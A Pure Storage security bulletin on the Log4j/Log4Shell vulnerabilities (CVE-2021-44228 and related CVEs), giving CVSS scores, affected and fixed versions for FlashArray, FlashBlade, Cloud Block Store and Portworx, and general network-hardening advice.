Security Bulletin for Log4j/Log4Shell CVE-2021-44228
This is a final statement and will be updated as necessary and included in the Pure Community Page. Multiple CVEs are addressed in this document related to Log4j / Log4Shell.
Product Resolution Guides | ||||
---|---|---|---|---|
Pure Resolution FAQ | Portworx - Log4j Solution | FlashArray - Log4j Solution | FlashBlade - Log4j Solution | CBS - Log4j Solution |
CVE-2021-44228
On December 9, 2021, a critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed (“vulnerability”). The vulnerability, if exploited, may result in Remote Code Execution (RCE) by logging a certain string on affected installations.
This vulnerability is being tracked as CVE-2021-44228. As stated in the CVE, “Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.” Applications that are remotely accessible, can handle user-input and use Log4j (version lower than 2.15.0) to log this input are potentially vulnerable. The CVE also states the following:
Apache Log4j versions prior to 2.15.0 are susceptible to a vulnerability that when successfully exploited could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
CVSS Base Scores
Product | CVSS Base Score |
---|---|
FlashArray | 9.6 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
Cloud Block Store | 9.6 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
FlashBlade | 8.4 CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
Portworx | 7.6 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H |
General Mitigation Best Practices
Pure Storage recommends following network security best practices that minimize the risk of compromise due to this vulnerability including, but not limited to:
- Restrict management interfaces to a trusted set of networks. Please see Best practices on restricting public IP addresses. Additional security posture hardening may be achieved by restricting all control plane access through a jump box (bastion host).
- Restrict outbound Internet access to trusted destinations. Phone Home and Remote Assist (RA) require port 443 (https) to be open to CloudAssist subnet 52.40.255.224/27 only for outbound traffic and your firewall will need to accept inbound traffic for the established connection.
- Pure Storage strongly encourages the widely-endorsed best practice of highly restricting -- if not blocking altogether -- Internet access to administrative login interfaces, including connections via SSH, TLS, remote consoles, and remote desktop mechanisms.
- Closely monitor arrays for abnormal or unexpected workload/ IO spikes or utilization as a leading indicator.
- Enable edge detection/protection mechanisms in the firewall / IDS / IPS systems to detect anomalous access or traffic patterns.
Affected Versions
Product | Affected Version(s) |
---|---|
FlashArray |
|
FlashBlade |
|
Cloud Block Store |
|
Portworx |
|
Pure Storage Orchestrator (PSO) | Pure Storage Orchestrator (PSO) is NOT affected by CVE-2021-44228, CVE-2021-45406, CVE-2021-45105. |
Pure Storage ActiveCluster On-Premises Mediator | Pure Storage ActiveCluster On-Premises Mediator is NOT affected by CVE-2021-44228, CVE-2021-45406, CVE-2021-45105 |
Fixed Versions & Mitigation Options
The following fixes are now available.
Product | Type | Version | Notes |
---|---|---|---|
FlashArray | Self-Service Patch |
|
Online non-disruptive patch to address the Log4j vulnerability delivered via Pure1. See FlashArray - Log4j Solution for more details. |
FlashArray | Manual Patch |
|
Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services. |
FlashArray | Purity Upgrade | All | Upgrades to the following versions of Purity//FA contain a permanent fix for Log4j: |
Cloud Block Store | Purity Upgrade | All | Upgrades to the following versions contain a permanent fix for Log4j:
See CBS - Log4j Solution for more details. |
FlashBlade | Self-Service Patch |
|
Online, non-disruptive patch to address the Log4j vulnerability delivered via Pure1. See FlashBlade - Log4j Solution for more details. |
FlashBlade | Manual Patch |
|
Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services. |
FlashBlade | Purity Upgrade | All |
Upgrades to the following versions of Purity//FB contain a permanent fix for Log4j: |
Portworx | CCM Service Upgrade |
Portworx CCM container release incorporating Apache Log4j v2.16.0 (fixes in ccm-service:3.0.8) See Portworx - Log4j Solution for more details. |
|
Pure VM Analytics OVA Collector | Upgrade | VMA collector v3.1.4 with the fixes is now available. Please refer to Upgrading Collectors for additional details. | |
Pure1 | N/A | N/A | Pure1 infrastructure has been successfully updated with the appropriate fixes. |
CVE-2021-45046
On Tuesday 14 December, 2021, CVE-2021-45046 was released. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
Pure Storage has completed evaluating implications of CVE-2021-45046 against all products.
- FlashBlade, FlashArray, Cloud Block Store are not affected by CVE-2021-45046.
- Portworx: Portworx is not affected by CVE-2021-45046. However, Portworx CCM container release incorporating Apache Log4j v2.16.0 fixes in ccm-service:3.0.8 is now available.
- Pure VM Analytics OVA Collector: VMA collector (v3.1.4) is now GA. New VM Analytics Collector OVA installations and upgrades will automatically receive VMA collector v3.1.4 which includes CCM v1.8.6 incorporating Apache Log4j v2.16.0 - Instructions For Updating Pure VMC OVA Collector. (NOTE: 3.3.1 is the common OVA version. Once installed, it will download the VMA collector version 3.1.4).
CVE-2021-45105
Pure Storage is aware of the Apache Security Vulnerability CVE-2021-45105 posted Saturday, 18-DEC-2021. Pure Storage has assessed all Pure product families against this vulnerability. FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.
CVE-2021-44832
Pure Storage is aware of the Apache Security Vulnerability CVE-2021-44832 posted Monday, 27-DEC-2021. Pure Storage has assessed all Pure product families against this vulnerability. FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.
Contacting Support
If you would like one of our engineers to assist you with this issue please call +1(866) 244-7121. If calling from outside the US here is a list of phone numbers: https://support.purestorage.com/Pure1/Support.